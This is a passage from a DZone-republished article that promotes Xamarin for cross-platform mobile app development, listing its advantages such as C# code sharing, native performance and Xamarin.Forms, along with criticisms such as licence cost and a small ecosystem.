programming language, event model, UI model, and resource model all differ from one platform to other. There was a need for a platform that enabled the developers to build applications for different operating systems using a single programming language, code base, and class library. Xamarin fills up this gap. With Xamarin, developers can share a lot of the app logic between platforms while building native UIs for each platform. Time to market gets reduced and clients get fluid performance of native apps without maintaining multiple code bases. Let’s Look at Xamarin Advantages Xamarin is a powerful platform that has several advantages. #1 Feature-rich Language Xamarin is equipped with a feature rich language C# with Lambda Expressions, Dynamic programming, LINQ, and has a rich APIs of .NET framework. Anything you can do in Objective-C, Swift, or Java, you can do in C#. Lately, Xamarin has added another powerful language called F# to its repertoire which adds to its credentials and makes it a go-to platform for app development. #2 Cost-effective Processes When building on Xamarin, it is possible for you to maintain the same code base for Android, iOS, and Windows phone applications. Developers are adopting Xamarin as it is one of the most cost effective ways to develop an app on all three platforms – Android, iOS, and Windows Phone in the shortest possible time. The only platform specific code is the UI. #3 Two Different IDEs When developers develop apps with Xamarin, they get two different integrated development environments (IDEs) – Visual Studio or Xamarin Studio to work on. They can choose any one of them that suits them and the platform they work on. Both Visual Studio and Xamarin Studio can help you create your backend with C#. #4 Compatible MVC and MVVM Design Patterns Xamarin supports both Model-View-Controller (MVC) and Model View ViewModel (MVVM) patterns. With the help of MVC pattern the developers are able to keep application logic and presentation neatly separate. The application code as a result is easier to modify, test, update, and maintain. MVVM pattern allows the programmers to create other projects while using the same code base as and when needed. There is bi-directional databinding between the view and the view model to ensure that the models and the properties in the view model are all in-sync with the view. The MVVM design pattern is for applications that require support for bi-directional databinding. #5 Code Reusage Xamarin provides the programmers option to reuse the code. This feature helps in reducing the coding time drastically. Programmers can use the same C# code for multiple mobile platforms. Possibilities become endless with custom plug-ins which can be compiled easily. Plug-ins are needed to communicate between JavaScript layer and C# layer. Once the communication is established the C# layer can be used across different devices reusing the codes. Even though C# code becomes reusable, the UI layer remains remarkably native in the particular Mobile OS Operating Environment. Xamarin thus is extremely versatile with integrated core. With Xamarin Forms developers claim that they achieve 96% reusability on their projects. #6 Shared App Logic When you build your apps on Xamarin, you need to code the application logic like database interactions, input validation, web service calls, backend enterprise integrations in C# just once. This app logic is then easily shared across multiple platforms. This saves on time and makes the builds stronger. #7 Portable Class Libraries Portable Class libraries or PCL make it easier for developers to share the same code base across multiple projects. The developers only need to write the code and libraries once and then they can be shared across Xamarin.iOS, Xamarin Android, and Windows Phone. PCL can be created with the help of Xamarin Studio or Visual Studio. Developers can create PCL for each platform. Interfaces can then be created to incorporate platform-specific functionality into the code. #8 Native Performance Unlike Phone gap or Appcelerator, apps run natively on Xamarin. The source code is compiled down to the native controls. Xamarin is built off the mono runtime, an Ecma standard compliant .Net Framework compatible and a C# compiler tool. The purpose of mono is to run Microsoft .Net applications cross-platform and this technology builds the foundation of cross-platform mobile development here. Developers write apps in C# and share the code base across different platforms. Xamarin leverages platform-specific hardware acceleration to make the mobiles deliver native performance. C# code after compilation gets converted into native binary code. C# code for iOS gets compiled ahead of time (AOT) into ARM binary code. C# code for Android Apps is compiled to intermediate language (IL), Just-In-Time and then is packaged with Android Virtual machine-Dalvik and Xamarin’s Mono VM. C# code for windows is compiled to IL and executed by the runtime. Apps built on Xamarin thus leverage platform-specific hardware acceleration and are compiled for native performance. Apps built on other cross-platform app building solutions interpret code at the runtime and thus cannot run natively. #9 Native User Interfaces Xamarin facilitates native user interfaces. Xamarin developers create app with native user interface (UI) controls. This enables the customization. Performance, look, and feel can be customized according to the mobile platform. An iOS app developed with Xamarin performs and looks just like an iOS application which is written in Objective-C. An android app developed using Xamarin looks, feels, and performs exactly like an android app developed using Java. As a cross platform development tool, Xamarin’s uniqueness lies in the fact that it separates application logic from the interface. Application codes are shared and native interface is built for each platform. The problem arises when Xamarin’s customers have big enterprise apps to develop and they don’t want to write a new interface for each screen on multiple platforms. Xamarin.Forms solves this problem. #10 Xamarin.Forms Xamarin.Forms is an API, a cross platform natively backed UI toolkit abstraction which helps in building user interface code that can be shared across iOS, Android, and Windows Phone apps. It is for the times the clients of Xamarin don’t want to develop native interfaces for devices on multiple platforms for an enterprise app as the size of the app is big. Xamarin.Forms is a library that contains about 40 common UI controls and navigation abstractions that make up the UI of different apps. Controls in the gallery include abstraction of pages-iOS ViewController, Android Activity or WP Page, Composable containers for layouts such as Grid and StackLayout, Abstractions for views-buttons, labels, text boxes, date and time pickers, images and more, controls for cells that allow you to combine a label with another visual element in tables and lists. These controls are available across platforms. When used on specific platforms and compiled, they are mapped to render native UI controls to get the look and feel of native components. You can choose and pick elements you want from both XF and native UI. Xamarin.Forms can only be used on iOS 6.1+, Android 4.0+, and Windows Phone 8 platforms. Older versions of these platforms are not compatible. #11 Native API Access Xamarin makes 100% of the iOS and Android APIs available through native bindings. It is the only platform with deep code sharing capabilities across iOS, Android, and Windows apps. Developers can refer to Apple’s CocoaTouch SDK frameworks and Google’s Android SDK as namespaces with C# syntax. Developers can also access platform specific features like iBeacons or Android fragments at the same time. Native API access makes it easier for developers to use C# syntax to access platform specific UI controls. #12 Enables High Performance Apps Apps built on Xamarin are not interpreted; they are compiled to a native binary. This native binary compilation provides the users with fluid app performance with native user interface. Xamarin apps can therefore deliver high performance and can be used for most demanding scenarios which require multi-touch user input, smooth scrolling, sophisticated animations and graphics, complex data visualization–like for flight simulation graphics and games that require high frame rates. #13 Cloud-hosted Test Service Xamarin provides a cloud-hosted test service. It provides a locally executed scripting environment to help you imitate and automate actions like a real mobile app user. It hosts more than 1,000 real non-jail broken devices in the test cloud–industry’s largest device cloud. You can run test scripts parallelly on hundreds of devices at a time. The test reports help you identify and troubleshoot bugs, UI problems, crashes, memory, and performance issues. With the help of Xamarin you can debug your code that you can run on hosted devices of your choosing. An automated cross platform test framework handles the applications you run. With the help of Xamarin Test cloud you can integrate device testing into your build process. You get test reports that provide you performance data. It helps you ensure every release is a quality release. You can make changes in your code and see the effect of those changes by comparing different test runs. The best part is you don’t have to write your own tests for the test cloud. Xamarin’s expert mobile app automation engineers can coach your team. You can also send your app and outsource the testing process to Xamarin. The experts author and conduct tests for you and send you the actionable report. #14 Xamarin Component Store Xamarin Component Store is built into Xamarin Studio and Xamarin’s Visual Studio extensions so that developers can add the needed component to the app with a few clicks. There are a lot of free and paid components for developers to choose from. There are third party web services and apps, cross-platform libraries, charts and graphs, UI controls, Cloud services, beautiful themes, and other powerful features–all to enhance Android, iOS, and Windows applications. All Xamarin components include a getting-started guide and a sample project. Some apps that were built using Xamarin are Cinemark, Mix Radio, Storyo, Novarum, Honeywell, etc. What do the naysayers say? Some app developers are not too fond of Xamarin. There are practical difficulties. It is costly. The licence cost per developer is very high. It is a new tool with a hefty price tag. Developers need to overcome a learning curve to use Xamarin–the Xamarin IDE and framework. Learning a new platform, language, and toolset takes time. Developers need to be fluent with C#/.Net. They need to know the iOS and Android frameworks, their user interfaces and lifecycles. In short, a developer would need to know all about android app development, iOS app development, and Windows app development along with the C#/.Net the language the codes will be written in. Xamarin will always need to be on its toes; everytime Android or iOS release a new SDK, Xamarin needs to update and release its APIs to match the SDKs as soon as possible. Xamarin does not allow code share or reuse outside of its own environment. This proves to be a limiting factor for some developers. It is a growing technology. Xamarin.Forms don’t address all the needs. It supports 40 UIs and controls. Developers still need access to several other Android specific UI controls. It has a smaller ecosystem. It is tough to find crowdsourced community support and solutions. Developers depend only on the Xamarin support when the bugs and other issues crop up. Productivity of designers and QAs suffer because of its smaller ecosystem. Conclusion There are several cross platform mobile development tools like PhoneGap, Sencha, Appcelerator, and Corona, but Xamarin is proving to be one of the most popular cross-platform mobile application development softwares. With the help of Xamarin, app developers can now build Android, iOS, and Windows Phone apps using the same C# codebase. The code can be written in C# and the platform agnostic codes can be shared between iOS, Android, and Windows Phone. The apps are completely native and reach the markets sooner. Xamarin provides a new way to make cross-platform apps and has its own ecosystem. It can be a little uncomfortable and limiting for a few developers. So, should App developers go for Xamarin? If you have the need and right resources—definitely. Published at DZone with permission of Openxcell Inc. See the original article here. Opinions expressed by DZone contributors are their own.
https://dzone.com/articles/should-app-developers-go-for-xamarin?utm_medium=feed&utm_source=feedpress.me&utm_campaign=Feed%3A+dzone%2Fmobile
CC-MAIN-2021-43
refinedweb
2,373
55.95
Thoughts and Discussion about Software Development and Technology Web Widgets with .Net : Part One This two part article is based on a presentation I gave at Tech Ed North America, Developers Week, 2008, about using .Net to create Web Widgets for the MSDN and TechNet sites. Part one will cover the creation of a basic widget, written in C# and JavaScript. Part two will update that widget to be more dynamic using C#, LINQ, JavaScript, JSON (JavaScript Simple Object Notation), and CSS. Web Widgets : A Simple Definition The best place to start is to give you a definition of Web Widgets. From Wikipedia.org, the following is a good description: “(a web widget) is a portable chunk of code that can be installed and executed within any separate HTML-based web page by an end user without requiring additional compilation.” The basic idea is that a consumer site only needs to deploy a simple script block which requires no compilation. We achieve this by setting the script block’s source (src) parameter to a Uri on a separate widget host server. All server side processing is done on the host server, which sends back client-side script to render the widget on the consumer. There are probably hundreds of possible ways to build a Web Widget, but I’m going to walk through one specific example using .Net. Typically, Web Widgets can be consumed on any domain outside the host domain. However, Browser Cookie data is available in the Request if in the widget is deployed within the same domain as it is hosted. Additionally, Request information such as Server Variables and QueryString are available in any domain. Let’s Write Some Code : A Basic Widget using an HttpHandler Now that we’ve covered some background about what we are building, let’s get to work. As I mentioned before, we are going to be using C# and JavaScript to build this. You could really use any .Net language for the Middle-Tier, but I found that the syntactical similarities between JavaScript and C# made switching gears between the two tiers a bit less jarring. The code for this first example can be downloaded here: Step 1 : Create an HttpHandler Base Class for all widgets to use. First, let’s create a base class that can be used for multiple widgets. It will handle the basic functionality of an HttpHandler. Note: I chose to use an HttpHandler here in order to avoid the overhead of the ASP.Net Lifecycle. There is no need in this pattern to use Viewstate, Page Events, or Postbacks, so I can avoid all the unnecessary overhead by using an HttpHandler. 1) Create a new Visual Studio C# Web Project and call it “Demo1” 2) Add a new directory called Handlers and add a WidgetBase.cs class file inside this folder. Mark that class as abstract since it will be our base class. 3) Implement the IHttpHandler interface 4) Using the VS2008 IntelliSense context menu, stub out the required members for an HttpHandler This will add the following interface members… IsReusable - property to let IIS know whether this handler can be re-used by other threads. ProcessRequest(HttpContext context)- The main method of a handler. This is where we will do the work to write a response to the browser. 5) Set IsReusable to return false to ensure thread safety – We don’t want any other requests to come in and modify variables 6) Add null reference checks to ProcessRequest, to avoid null reference exceptions if (context != null && context.Request != null && context.Response != null) { } 7) Add an abstract BuildOutput() method that returns a string. We want to force inheritors to use this method. public abstract string BuildOutput(); 8) Add a member variable to hold a reference to the HttpContext object that is passed into ProcessRequest private HttpContext _context; 9) Response.Write the results of BuildOutput in ProcessRequest, using the Response object in the _context member variable just added in step 8. _context = context; _context.Response.Write(BuildOutput()); _context = context; _context.Response.Write(BuildOutput()); 10) Add Request and Response shortcuts, using _context member variable. We will be using these shortcuts later, in the widgets that use this base class. /// <summary> /// Shortcut to Request object /// </summary> public HttpResponse Response get { return _context.Response; } } public HttpRequest Request get { return _context.Request; } That is all the work we need to do in WidgetBase for now. Let’s move on to create a object of type WidgetBase. Step 2 : Create an EventsWidget class and wire up the handler in IIS 1) Add a new class file called EventsWidget.cs to the Handlers directory 2) Implement the WidgetBase class and stub out the BuildOutput method using the handy VS2008 Intellisense dropdown 3) Create and return a string called “output” in the BuildOutput method and initialize it to the common “Hello World!” value, since this is the first time we’ll run this application. public override string BuildOutput() string output = "Hello World!"; return output; 4) Open an IIS Management Console and navigate down the application you are running this project in. (Create an application if you haven’t already) 5) In the application configuration features view, look for the “Handler Mappings” feature and double click it to see a list of existing handlers. 6) In the “Actions” area of this view, click the link to “Add Managed Handler” 7) Set up the new Managed Handler similar to the settings below. Request Path: eventswidget.jss Type: Demo1.Handlers.EventsWidget Name: EventsWidget 8) The handler should be ready to run now, so let’s check it in a browser. Open up your favorite browser and navigate to the application you’ve been working in. Add the request path you created in step 7 above to the URI to hit the handler you’ve created. You should see a friendly “Hello World!” message on the screen. Step 3 : Modify the HttpHandler to output JavaScript 1) Add a new directory called “templates” to hold script templates, and add a new file called core.js. This file will be used as a utility class to hold functions common to widgets. 2) Open /templates/core.js and add the following code to setup a namespace, constructor, and class definition for an object called Core. (Note: you should modify the namespace to match your own company or team) /** Microsoft.Com.SyndicationDemo.Core.js: shared functionality for widgets **/ // Namespace definition : All Widget Classes should be created in this namespace // if (!window.Microsoft) window.Microsoft = {}; if (!Microsoft.Com) Microsoft.Com = {}; if (!Microsoft.Com.SyndicationDemo) Microsoft.Com.SyndicationDemo = {}; // Widget Core Constructor // Microsoft.Com.SyndicationDemo.Core = function(message) document.write(message); // Widget Core Class Definition // Microsoft.Com.SyndicationDemo.Core.prototype = } var core = Microsoft.Com.SyndicationDemo.Core("Hello from JS!"); The above JavaScript code is using a feature of the JavaScript language to create a class definition, called Prototype-based Programming. When we “new” up a version of this Core object, it will run the code in the constructor and write out a message via JavaScript. 3) Add a method to WidgetBase which will allow us to read the contents of the JavaScript file we just created. Modify WidgetBase.cs by adding the following method: public string ReadFromFile(string fileName) { string fileContents = string.Empty; if (HttpContext.Current.Cache[fileName] == null) { string filePath = HttpContext.Current.Server.MapPath(fileName); if (File.Exists(filePath)) { StreamReader reader; using (reader = File.OpenText(filePath)) { fileContents = reader.ReadToEnd(); } } HttpContext.Current.Cache.Insert(fileName, fileContents, new System.Web.Caching.CacheDependency(filePath)); } else fileContents = (string)HttpContext.Current.Cache[fileName]; return fileContents; } 4) Modify EventsWidget.cs to read the JavaScript file using the method we just created. Change the content of the BuildOutput() method to the following: string output = base.ReadFromFile(ConfigurationSettings.AppSettings["CoreJavascriptFileName"]); return output; 5) Lastly, lets hook up this handler in a script block so that it actually runs in a script context. Add a new file called default.aspx to the root of the application. This file will serve as a test harness for our widgets. Add the following script block to the new page: <script type="text/javascript" src="eventswidget.jss"> </script> 6) At this point, we can now hit the new default.aspx in the browser. It should display a friendly message from JavaScript. If you do not see any message, try hitting the handler directly to see if it is throwing an error. In part two of this article, I will use this project as a starting point and make it dynamic. Part two will cover accessing data, passing data to JavaScript, and working with Styles via CSS. If you would like to receive an email when updates are made to this post, please register here RSS PingBack from Introduction This article is a continuation of an article about Web Widgets posted previously here: i cannot access the widget from another domain. any ideas? Which version of IIS are you using? I don't see the Add Managed Handler dialog box in the Microsoft Management Console version 3.0. Thanks, pcrabtree@raritantechnologies.com Crabtree, I am using IIS 7.0. The "Add Managed Handler" feature was not included in IIS 6.0. Try the following steps to find the feature. 1) Using MMC snap-in for IIS 7.0, click on the site or application you want to manage. This will display a list of features that you can manage, grouped by area (ASP.NET, IIS, Management). 2) Look in the IIS area for a feature called "Handler Mappings" and double click on it. This will take you to the "Handler Mappings" management feature. The main window displays a list of existing mappings, and the right pane displays a list of Actions you can take. 3) In the right pane, look for "Add Managed Handler" link and click on it. This will open the feature's dialog box, where you can follow the rest of the steps listed in my post above. You can also access this feature by right-clicking anywhere in the list of existing mappings. Hope that helps! Newbie, Can you provide any more information about the problem? Are you able to see any errors that might help me troubleshoot the issue? Also, you might try tools like Fiddler, httpWatch, or Firebug to see if there are networking or script errors with your widget. These types of debugging tools are absolutely invaluable when working with widgets! Great article! One question though, Is there any way to deploy/implement a .NET based widget with IIS 6.0 (which doesn't have a managed handlers option of IIS 7.0 Mgt Console)? Nissan, I haven't hooked this project up on an IIS 6.0 server, but you should be able to do the following to add an HttpHandler in IIS 6. The config setting for the Handlers in IIS 6.0 are stored in a different web.config section, see below... <system.web> <httpHandlers> <add verb="GET,HEAD" path="eventswidget.jss" type="Demo1.Handlers.WidgetBase, Demo1" validate="false" /> </httpHandlers> </system.web> Please comment back if this doesn't work for you! Hi Paul, Thanks for this share this work. Could you help me plz. I tried to use in net2 using one external Json.net library. My problem is not this, but after full compiling with no errors and tried I have one error during use like: abstract class not well formed in WidgetBase Demo1, same problem in Demo2 in C#2005. I have controled many times and verify definition of abstract classes but nothing. Some suggestion. Regards Hey Paul, I implemented the recommendation you posted, and while it worked fine on my VS 2008 development environment, once I checked in my changes and it built to the Windows 2003 Server testing box it resulted in a "The page cannot be found" error when trying to reference the eventswidget.jss file. Now to be honest my dev box is Vista not XP but I am debugging in VS 2008 Pro so it should have worked once deployed to the 2003 server running IIS 6.0 since it executed the web.config changes successfully to render the page on the VS 2008 internal web server. Any ideas on next steps to troubleshooting this error? Hi Nissan, If you deploy to IIS 6.0, the web.config file will store the httpHandlers in a different section. This would cause you to get the 404 error. Please try the following. I was just wandering if i could create some web widgets (using VS 2005/2008, C#). The code is superb and i could create and add my own widget to my local sample application. However, I have few questions... 1. Do I need Scripts to make the widgets work? 2. Is there any mechanism provided by ASP.NET to build widgets? 3. Is there any tool which could emit Javascript for me? 4. Can I use AJAX to create widgets? It'll be very grateful if you throw some light on the questions i have. Regards, Amit Gautam I am unable to download the code from the given link...i get a server error. Is there any other way i can get the code. Thanks Ramesh, Please give that link another try. I think you may have hit a temporary error on the Code Gallery site. I don't have the code hosted anywhere else, so hopefully that link will work for you the second time. If not, please let me know and I will see what I can do. Amit, I'll attempt to answer your questions inline below... In the scenario I've demonstrated, yes. There are many ways to make widgets thoough, and you could conceivably find a way to just inject HTML into the consuming page without using JavaScript. Try searching for other widgets on the web and you will find other technologies used to achieve the same purpose. With ASP.Net MVC framework and jQuery you could create widgets. I am looking into writing a part 3 of this article using ASP.Net MVC and jQuery. Look into script#. Also, if you are shy about JavaScript, the jQuery library can provide a much easier way for you to utilize the language with the huge learning curve. Yes, and you could use Ajax to load data into widgets as well. I was attempting to create a one-request widget with this article, so I avoided making additional Http calls via Ajax. If you use the ASP.Net Ajax library, you need to ensure the consuming site also uses this technology.
http://blogs.msdn.com/pajohn/archive/2008/06/18/web-widgets-with-net-part-one.aspx
crawl-002
refinedweb
2,425
66.33
![if !IE]> <![endif]> Native Methods Although it is rare, occasionally you may want to call a subroutine that is written in a language other than Java. Typically, such a subroutine exists as executable code for the CPU and environment in which you are working—that is, native code. For example, you may want to call a native code subroutine to achieve faster execution time. Or, you may want to use a specialized, third-party library, such as a statistical package. However, because Java programs are compiled to bytecode, which is then interpreted (or compiled on-the-fly) by the Java run-time system, it would seem impossible to call a native code subroutine from within your Java program. Fortunately, this conclusion is false. Java provides the native keyword, which is used to declare native code methods. Once declared, these methods can be called from inside your Java program just as you call any other Java method. To declare a native method, precede the method with the native modifier, but do not define any body for the method. For example: public native int meth() ;). A detailed description of the JNI is beyond the scope of this book, but the approach described here provides sufficient information for simple applications. The easiest way to understand the process is to work through an example. To begin, enter the following short program, which uses a native method called test( ): // A simple example that uses a native method. public class NativeDemo { int i; public static void main(String args[]) { NativeDemo ob = new NativeDemo(); ob.i = 10; System.out.println("This is ob.i before the native method:" + ob.i); ob.test(); // call a native method System.out.println("This is ob.i after the native method:" + ob.i); } declare native method public native void test() ; load DLL that contains static method static { System.loadLibrary("NativeDemo"); } } loadLibrary( ) method, which is part of the System class. This is its general form: static void loadLibrary(String filename) Here, filename is a string that specifies the name of the file that holds the library. For the Windows environment, this file is assumed to have the .DLL extension. After you enter the program, compile it to produce NativeDemo.class. Next, you must use javah.exe to produce one file: NativeDemo.h. (javah.exe is included in the JDK.) You will include NativeDemo.h in your implementation of test( ). To produce NativeDemo.h, use the following command: javah -jni NativeDemo This command produces a header file called NativeDemo.h. This file must be included in the C file that implements test( ). The output produced by this command is shown here: /* DO NOT EDIT THIS FILE - it is machine generated */ #include <jni.h> /* Header for class NativeDemo */ #ifndef _Included_NativeDemo #define _Included_NativeDemo #ifdef _ _cplusplus extern "C" { #endif /* * Class: NativeDemo Method:test Signature: ()V */ JNIEXPORT void JNICALL Java_NativeDemo_test (JNIEnv *, jobject); #ifdef _ _cplusplus } #endif #endif Pay special attention to the following line, which defines the prototype for the test( ) function that you will create: JNIEXPORT void JNICALL Java_NativeDemo_test(JNIEnv *, jobject); Notice that the name of the function is Java_NativeDemo_test( ). You must use this as the name of the native function that you implement. That is, instead of creating a C function called test( ), you will create one called Java_NativeDemo_test( ). The NativeDemo component of the prefix is added because it identifies the test( ) method as being part of the NativeDemo class. Remember, another class may define its own native test( ) method that is completely different from the one declared by NativeDemo. Including the class name in the prefix provides a way to differentiate between differing versions. As a general rule, native functions will be given a name whose prefix includes the name of the class in which they are declared. After producing the necessary header file, you can write your implementation of test( ) and store it in a file named NativeDemo.c: /* This file contains the C version of the test() method. */ #include <jni.h> #include "NativeDemo.h" #include <stdio.h> JNIEXPORT void JNICALL Java_NativeDemo_test(JNIEnv *env, jobject obj) { jclass cls; jfieldID fid; jint i; printf("Starting the native method.\n"); cls = (*env)->GetObjectClass(env, obj); fid = (*env)->GetFieldID(env, cls, "i", "I"); if(fid == 0) { printf("Could not get field id.\n"); return; } i = (*env)->GetIntField(env, obj, fid); printf("i = %d\n", i); (*env)->SetIntField(env, obj, fid, 2*i); printf("Ending the native method.\n"); } Notice that this file includes jni.h, which contains interfacing information. This file is provided by your Java compiler. The header file NativeDemo.h was created by javah earlier. In this function, the GetObjectClass( ) method is used to obtain a C structure that has information about the class NativeDemo. The GetFieldID( ) method returns a C structure with information about the field named "i" for the class. GetIntField( ) retrieves the original value of that field. SetIntField( ) stores an updated value in that field. (See the file jni.h for additional methods that handle other types of data.) After creating NativeDemo.c, you must compile it and create a DLL. To do this by using the Microsoft C/C++ compiler, use the following command line. (You might need to specify the path to jni.h and its subordinate file jni_md.h.) Cl /LD NativeDemo.c This produces a file called NativeDemo.dll. Once this is done, you can execute the Java program, which will produce the following output: This is ob.i before the native method: 10 Starting the native method. i = 10 Ending the native method. This is ob.i after the native method: 20 Related Topics Copyright © 2018-2020 BrainKart.com; All Rights Reserved. Developed by Therithal info, Chennai.
https://www.brainkart.com/article/Native-Methods---Java_10502/
CC-MAIN-2020-29
refinedweb
942
59.3
Today we would like to share with you a simple tutorial how to write a plugin with custom language support for IntelliJ IDEA and IntelliJ Platform. As you know IntelliJ IDEA provide powerful facilities for developers to implement advanced code assistance for custom languages and frameworks. In this step-by-step tutorials you will learn how to use Grammar-Kit to generate a parser and PSI elements, how to use JFlex to generate a lexer, how to implement custom formatting, refactoring support, etc. The sample code for this tutorial can be found on GitHub. More steps with other aspects of plugin development are coming soon. In the meanwhile don’t miss the opportunity to register for the second live coding webinar about plugin development, which will take place on Tuesday, January 22. Develop with Pleasure! This is great! If only this was available a month ago, when I started playing with this. By now, I’ve figured out almost everything of this by myself, using the Erlang plugin and the Developing Custom Language Plugins for IntelliJ IDEA page (). I haven’t needed the reference contributor, though. What is it needed for? Also, what I’m playing with now involves navigating across files. Stub indexes etc. Cool stuff, although I’m not sure I fully understand it. The Indexing and PSI Stubs in IntelliJ IDEA page () only provides a very basic introduction. Oh, and reference resolution. That’s pretty important topic, I’d suggest covering the scope processors stuff as well. It isn’t needed for such extremely simple language, but it’s absolutely essential once you start playing with something real. Thank you! Please share tutorial how to write a complete plugin for PyCharm;) or API Reference Will such a custom language plugin only work in IntelliJ IDEA or also with the other IDE’s, like PHPStorm or PyCharm? Could you please also explain, on an example, how the pin and recoverUntil work, as well as how to simplify the AST trees by using the extends? Awesome! This is great! I noted that the “Lexer and Parser Definition” page is missing a step to create the SimpleFile class that is used in the parser definition. Looking forward to writing my first plugin now. @Alberto: It usually works in all IDEs, depends on how you define the metadata. @Alberto: please see for more information about making your plugin compatible with other IntelliJ based products @Tobias You are right, thanks. Fixed. +∞ to Luke. The GrammarKit documentation altogether would need some love, but the only important thing I really didn’t understand is pin/recoverUntil. Or actually, I think that I understand them (when a pinned element of the rule is successfully parsed, the rule itself will be considered successfully parsed, and the parser will eat all the following tokens until it reaches some tokens from the recoverUntil set), but I have a really hard time using them correctly. Basically, since I have a C-like syntax, I just settled with a single pinned element in a grammar and a single recoverUntil on ‘;’ or ‘}’. Everytime I try to add some more, the parser stops working and I have no idea why Ladislav, If you have any specific questions regarding the stubs/indexes, please ask, and we’ll update the document to make sure they’re covered. Konrad, Great product! This time its mine @Ladislav, @Luke Please check out and the 5 lines below. This is a perfectly working example of recoverUntil concept. @Sergey Thanks, but I was able to get to something very similar. I have a working rule with pin/recoverUntil in my grammar, just by following the documentation. That, however, isn’t enough to really understand. Once I get back to it, I will probably end up reverse engineering the concept from differences in generated code. Oh, and one thing I found just before few minutes. GrammarKit doesn’t support generating classes needed for stub indexes. It looks like it is possible to write all that manually, but it requires working around some GrammarKit bugs: 1. GrammarKit doesn’t like generics (extra interface for each StubBasedPsiElement needed), 2. GrammarKit doesn’t generate proper imports in generated visitor (and for this, there is a pull request with fix for more than 2 months!). And that’s only a beginning for me. may shed more light on grammar-kit error recovery The FindUsagesProvider-section uses an static word-scanner-instance. public WordsScanner getWordsScanner() { return WORDS_SCANNER; } As far as I know this will cause threading issues as the lexer is not thread safe. Is any way to extend existing ‘language plugin’ with minimal efforts? For example, i need plugin for Squirrel language: Its like slightly simplifier and abit extended version of Java. Thanks for the tutorial, but IntelliJ doesn’t seem to associate the file type specified with my language after following step 2: Language and file type. Totally agreed that this is an outstanding tutorial! However, like Luke and Ladislav, I still don’t quite understand how best to use pin and recoverUntil, even after looking at the Erlang grammar. The language I’m implementing is very Java-like, and I’ve made some progress with pins so that I now get “foo expected, found bar” most of the time, but I have a feeling I’m abusing it rather than using it. Also, every time I try to use recoverUntil, primarily by using an expression such as “!(SEMICOLON | RBRACE)”, I just end up tanking the parser. I’d be happy to share a few simple rules from my grammar as concrete examples of those help the discussion. I’m sorry but while this “tutorial” may be a good start to see what operations must be done in which order, it’s not even close to being a tutorial. It’s a recipe, there is almost no explanation for most of the steps and the reader is just led blindly through it. And the example is not practical either. I understand it has to be simple, but like so many examples it just lacks the fundamental links people need in order to build an actual case. What for example if I want to build a real parser, it will have to let the grammar get some information from what the lexer is sending (number value, identifier string, …). The JFlex documentation shows how to define a type that contains this information but here it’s all really fuzzy, I gather that somehow it has to be based on IElementType but then what? If I scan a string, where do I put the contents? If it’s an integer, where should the value go? This could be a basic grammar, no need for complex stuff, but at least it would show the reader how to do practical things. Is there any good example of a language plugin out there which is based on a JFlex lexer and a .bnf grammar definitions? The only ones I found did their own recipe for the grammar part, either with Scala routines or home-made code which seems to amount to ten times the effort (or even trying to squeeze part of the grammar in the lexer, which makes it even worse). Thanks for all the work done so far anyway @Noah I’ve just started with plugin development for a custom language and even I have the same feeling did you get to find any resources or tutorials which could have helped you? Thanks in advance Same feeling here. After 2 years, the sources on Github are no longer available, too. I figured out with some search/try/error how to go some steps but this really is no tutorial. Just looking at the erlang-plugin and the provided information of the grammar-kit project on Github gave me more insight. I be happy to see this tutorial extended with some more text or a least updated so that the example sources are available again The updated tutorial is available at The sources moved to And actually it doesn’t work. If you take the project from Git, it compiles the first time. Try and generate the parser from the BNF file and it all goes haywire. Generated parser: import static com.simpleplugin.parser.GeneratedParserUtilBase.*; [...] builder_ = adapt_builder_(root_, builder_, this, null); In the GeneratedParserUtilBase.java file, you realize that the static constructor has a different signature: public static PsiBuilder adapt_builder_(IElementType root, PsiBuilder builder, PsiParser parser) And by the way, the GeneratedParserUtilBase.java file you provide as a separate link is completely different and also incompatible. It already starts with this: package org.intellij.grammar.parser; which is actually a different package! What a mess. Why isn’t that file part of the SDK in the first place, as should the GrammarKit, it’s the best way to ensure consistency between those parts. Trying to change the package to match the com.simpleplugin.parser is not enough. Now the PsiBuilder type is missing the .rawTokenIndex() method, PsiBuilderImpl.ProductionMarker is missing the .getStartIndex() method. Trying to change the SDK from 129.1359 to 133.286, regenerating parser. Nope, now PsiBuilder.rawTokenIndex() is there, but PsiBuilderImpl.ProductionMarker is still missing getStartIndex(), plus a new getEndIndex() method… I’m giving up for now, the lack of documentation or at least of a relevant example, the inconsistency between those parts, make it too much trouble to use. Back to Eclipse and Xtext I guess, a shame. Found the bug, apparently this line has to be changed in the BNF, since this file IS indeed part of the SDK and doesn’t need to be included from elsewhere: stubParserClass=”com.intellij.lang.parser.GeneratedParserUtilBase” It only works with SDK 133.286 though, with the other ones it produces more errors that I will care to report. So it finally compiles. Then all the unit tests but one fail in SimpleCodeInsight. The SimpleParsingTest simply crashes… For anyone encountering this issue I can run with the current master by NOT using the supplied ‘light-psi-all.jar’ and instead using my current install of intellij. java -cp ‘/path/to/grammar-kit.jar:/path/to/intellij/lib/*’ org.intellij.grammar.Main gen src/bnf/MyGrammar.bnf I want to navigate from variable to its declaration etc, but i dint find any anything related to navigation in the tutorial. can somebody please help me out for the same. Got all of this compiling and working in debug mode, but when you deploy the plugin and try it for real it loads with no errors, but none of the functionality is there. Any ideas why ? Cheers Adam the github link is 404 Yes, it moved. The correct link is Hi! I am trying to build similar plugin, is there any possiblity to create such a plugin without BNF file? We cannot find the proper file in the Internet and the language is much more complicated than than example one. I figured out that the DSL definition (syntax) and Editor styles are much easier configure in MPS as to code it. But unfortunately its not possible to export it as a plain Custom Language Support Plugin. Thats really a pitty. Or do I understand something wrong here/their? Hi, very old post but still I have to ask. Is there any real tutorial with explanations for writing a language plugin? Because based on what JetBrains offers I can get a working example , but with literally 0 understanding on whats going on. Hi David, check those links:
https://blog.jetbrains.com/idea/2013/01/how-to-write-custom-language-support-plugins/?replytocom=439804
CC-MAIN-2020-10
refinedweb
1,917
64.41
